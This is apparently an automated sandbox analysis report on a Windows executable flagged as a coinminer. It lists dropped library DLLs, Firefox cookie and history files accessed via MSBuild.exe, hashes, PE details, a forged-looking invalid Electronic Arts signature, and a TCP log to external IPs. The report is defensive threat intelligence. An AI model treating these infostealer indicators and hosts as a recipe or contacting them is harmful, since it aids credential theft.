                                                                                                                                                                                                                                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):257872
                                                                                                                                                                                                                                                                          Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):80880
                                                                                                                                                                                                                                                                          Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Entropy (8bit):7.771743518480777
                                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                          File name:SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                                                                                                                                                                                                                                                                          File size:2'952'808 bytes
                                                                                                                                                                                                                                                                          MD5:7f1e688e77760ad29c560404a2fb9d2f
                                                                                                                                                                                                                                                                          SHA1:7c06e05c8e13d01df26653cbe12695af139c5854
                                                                                                                                                                                                                                                                          SHA256:086bcb65380fa0e4d23c07fbff58863949f8158b87d07cd6eac6485d99b3bf0d
                                                                                                                                                                                                                                                                          SHA512:e841524c36ec9f550bbd299fbd33bbf15587dde922c747ae719bea03c387e62bbb9a73fdee0188dfb1586cca5b9dc81745144e633ed3dcb661434ab1c87e393e
                                                                                                                                                                                                                                                                          SSDEEP:49152:lAfXmQ/GT5+pDEuOwHLHE83/G9+SbSyCfHtl8/ioefjKxAd2jVAeIXT:2+4GT0OSL04Dl8/gcAsJAeIj
                                                                                                                                                                                                                                                                          TLSH:B1D5F1DAE5C5D542FA6E17B19186F77840699FED32069A1685F48CE3B211F8B2C33833
                                                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l."f..................&.........n.&.. ........@.. .......................@-......,&...`................................

                                                                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                                                                          Icon Hash:e8c486932380c060

                                                                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Entrypoint:0x66fd6e
                                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                          Time Stamp:0x6622B46C [Fri Apr 19 18:14:04 2024 UTC]
                                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                                                                          Authenticode Signature

                                                                                                                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                                                                                                                          Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                          Error Number:-2146869232
                                                                                                                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                                                                                                                          • 04/05/2023 01:00:00 07/05/2026 00:59:59
                                                                                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                                                                                          • CN="Electronic Arts, Inc.", OU=EAC, O="Electronic Arts, Inc.", L=Redwood City, S=CALIFORNIA, C=US
                                                                                                                                                                                                                                                                          Version:3
                                                                                                                                                                                                                                                                          Thumbprint MD5:33BD4710688F5874BAC612E52BCCEEA8
                                                                                                                                                                                                                                                                          Thumbprint SHA-1:A46E87AEBD8693AE8B3B2F26449F8828368B4D4F
                                                                                                                                                                                                                                                                          Thumbprint SHA-256:0F952F3F6AF7C5B1FE753761AD34E2C360930EF530EB6A753AB461046F79C049
                                                                                                                                                                                                                                                                          Serial:0671352DC4C103B70AE725E954486374

                                                                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al

                                                                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x26fd200x4b.text
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2700000x60400.rsrc
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x2ce6000x2868
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2d20000xc.reloc
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                          Sections

                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                          .text0x20000x26dd740x26de002452b198dcf9b2bcd476624818cee2e3unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          .rsrc0x2700000x604000x60400836d98483ef186103616eb3c0a2abf27False0.2370408887987013data5.0618585646992935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          .reloc0x2d20000xc0x200ffe6eb157eba8b42fcca8c96dde60171False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                          Resources

                                                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                          RT_ICON0x2702680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.675531914893617
                                                                                                                                                                                                                                                                          RT_ICON0x2706d00x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.5127504553734062
                                                                                                                                                                                                                                                                          RT_ICON0x2717f80x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.4422294548413344
                                                                                                                                                                                                                                                                          RT_ICON0x273e600x4428Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.3707588262265016
                                                                                                                                                                                                                                                                          RT_ICON0x2782880x11028Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.2691325066023654
                                                                                                                                                                                                                                                                          RT_ICON0x2892b00x44028Device independent bitmap graphic, 256 x 512 x 32, image size 262144EnglishUnited States0.2024424915998966
                                                                                                                                                                                                                                                                          RT_MESSAGETABLE0x2cd2d80x2840dataEnglishUnited States0.28823757763975155
                                                                                                                                                                                                                                                                          RT_GROUP_ICON0x2cfb180x5adataEnglishUnited States0.7444444444444445
                                                                                                                                                                                                                                                                          RT_VERSION0x2cfb740x308dataEnglishUnited States0.47036082474226804
                                                                                                                                                                                                                                                                          RT_MANIFEST0x2cfe7c0x4d2XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1174), with CRLF line terminatorsEnglishUnited States0.47568881685575365

                                                                                                                                                                                                                                                                          Imports

                                                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                                                          mscoree.dll_CorExeMain

                                                                                                                                                                                                                                                                          Possible Origin

                                                                                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                          EnglishUnited States

                                                                                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:27:52.447638988 CEST49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:02.056915045 CEST49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:07.556871891 CEST49731443192.168.2.423.76.43.59
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:07.556955099 CEST4434973123.76.43.59192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:07.557050943 CEST49731443192.168.2.423.76.43.59
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:07.569700003 CEST49731443192.168.2.423.76.43.59
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:07.569770098 CEST4434973123.76.43.59192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:07.800870895 CEST4434973123.76.43.59192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:07.800966024 CEST49731443192.168.2.423.76.43.59
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:07.849687099 CEST49731443192.168.2.423.76.43.59
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:07.849749088 CEST4434973123.76.43.59192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:07.850681067 CEST4434973123.76.43.59192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:07.850856066 CEST49731443192.168.2.423.76.43.59
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:07.854593992 CEST49731443192.168.2.423.76.43.59
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:07.896150112 CEST4434973123.76.43.59192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.195302010 CEST4434973123.76.43.59192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.195358992 CEST4434973123.76.43.59192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.195502996 CEST4434973123.76.43.59192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.195507050 CEST49731443192.168.2.423.76.43.59
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.195508003 CEST49731443192.168.2.423.76.43.59
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.195580959 CEST4434973123.76.43.59192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.195641041 CEST49731443192.168.2.423.76.43.59
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.195641041 CEST49731443192.168.2.423.76.43.59
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.297647953 CEST4434973123.76.43.59192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.297844887 CEST49731443192.168.2.423.76.43.59
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.297907114 CEST4434973123.76.43.59192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.297970057 CEST49731443192.168.2.423.76.43.59
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.315969944 CEST4434973123.76.43.59192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.316165924 CEST49731443192.168.2.423.76.43.59
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.316195965 CEST4434973123.76.43.59192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.316262007 CEST49731443192.168.2.423.76.43.59
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.316734076 CEST49731443192.168.2.423.76.43.59
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.316793919 CEST4434973123.76.43.59192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.335810900 CEST49732443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.335891008 CEST4434973237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.335977077 CEST49732443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.336361885 CEST49732443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:08.336405039 CEST4434973237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:09.037714005 CEST4434973237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:09.037944078 CEST49732443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:09.042977095 CEST49732443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:09.043028116 CEST4434973237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:09.043548107 CEST4434973237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:09.047411919 CEST49732443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:09.047678947 CEST49732443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:09.092128038 CEST4434973237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:09.585011005 CEST4434973237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:09.585174084 CEST4434973237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:09.585262060 CEST49732443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:09.585262060 CEST49732443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:09.587719917 CEST49732443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:09.587778091 CEST4434973237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:09.589997053 CEST49733443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:09.590076923 CEST4434973337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:09.590394020 CEST49733443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:09.590502024 CEST49733443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:09.590529919 CEST4434973337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:10.057231903 CEST4434973337.27.87.155192.168.2.4
